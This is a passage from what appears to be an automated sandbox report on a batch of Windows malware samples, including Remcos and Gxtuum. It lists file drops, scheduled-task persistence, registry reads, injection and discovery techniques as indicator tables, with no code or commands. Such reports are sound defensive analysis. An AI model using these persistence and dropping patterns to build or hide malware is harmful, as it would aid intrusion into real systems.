| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\f21.bmp | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-DCU30.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-AHIH9.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-N5V1T.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-PRVGE.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-2FP8S.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\back3.bmp | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\d1.bmp | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\ac2.bmp | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\Languages\is-HIV3C.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\Languages\is-T4OHF.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\x2.bmp | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\t1.bmp | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File created | C:\Program Files (x86)\Kuwait Ice Hockey DB\is-8KV2G.tmp | C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-GT5TL.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\w2.bmp | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-2S9QH.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\back.png | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AnyDesk\AnyDesk.exe | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-FBO4V.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-QFNHP.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File opened for modification | \??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\wow.htm | C:\Users\Admin\Desktop\Files\wow.exe | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-FGGQA.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-IBUCV.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\x1.bmp | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe | C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp | N/A |
| File created | C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe | C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-C95O9.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-SVBK7.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\w1.bmp | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| File opened for modification | \??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\wow.gif | C:\Users\Admin\Desktop\Files\wow.exe | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\ac1.bmp | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-F36PK.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-8ANHN.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-VFT99.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-35B8I.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-6ORKR.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-BKHF2.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\Languages\is-AQET7.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\ac3.bmp | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | N/A |
| File created | C:\Windows\fonts\pssystem-regular.ttf | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File opened for modification | C:\Windows\msdownld.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\msdownld.tmp\AS5B91B3.tmp\dxupdate.cab | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\msdownld.tmp\AS5B91B3.tmp\dxupdate.cab | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\Desktop\Files\Mswgoudnv.exe | N/A |
| File created | C:\Windows\msdownld.tmp\AS5BC72B.tmp\dxupdate.cab | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\msdownld.tmp\AS5BC72B.tmp\dxupdate.cab | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\msdownld.tmp\AS5BC72B.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\Files\twztl.exe | N/A |
| File opened for modification | C:\Windows\fonts\pssystem-regular.ttf | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| File opened for modification | C:\Windows\Logs\DirectX.log | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| File opened for modification | C:\Windows\msdownld.tmp\AS5B91B3.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\Files\twztl.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\pornhub_downloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\PORNHU~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\surfex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\surfex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\Mswgoudnv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3dismhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\onetap.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\gnabpgw\wohcj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\gnabpgw\wohcj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\gnabpgw\wohcj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dismhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\surfex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\2dismhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\twztl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\gnabpgw\wohcj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
